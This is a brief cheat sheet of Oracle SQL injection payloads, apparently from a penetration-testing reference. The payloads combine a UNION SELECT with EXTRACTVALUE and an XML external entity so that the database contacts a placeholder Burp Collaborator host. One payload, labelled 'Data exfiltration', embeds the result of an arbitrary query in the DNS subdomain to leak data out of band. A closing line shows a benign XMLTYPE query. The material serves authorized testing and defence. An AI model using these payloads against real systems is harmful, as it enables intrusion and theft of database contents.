' UNION SELECT EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l') FROM dual--
Data exfiltration
' UNION SELECT EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(<SQL_QUERY_HERE>)||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l') FROM dual--
Oracle
SELECT XMLTYPE('<?xml version="1.0"?><document><employee>John</employee></document>')
FROM dual;
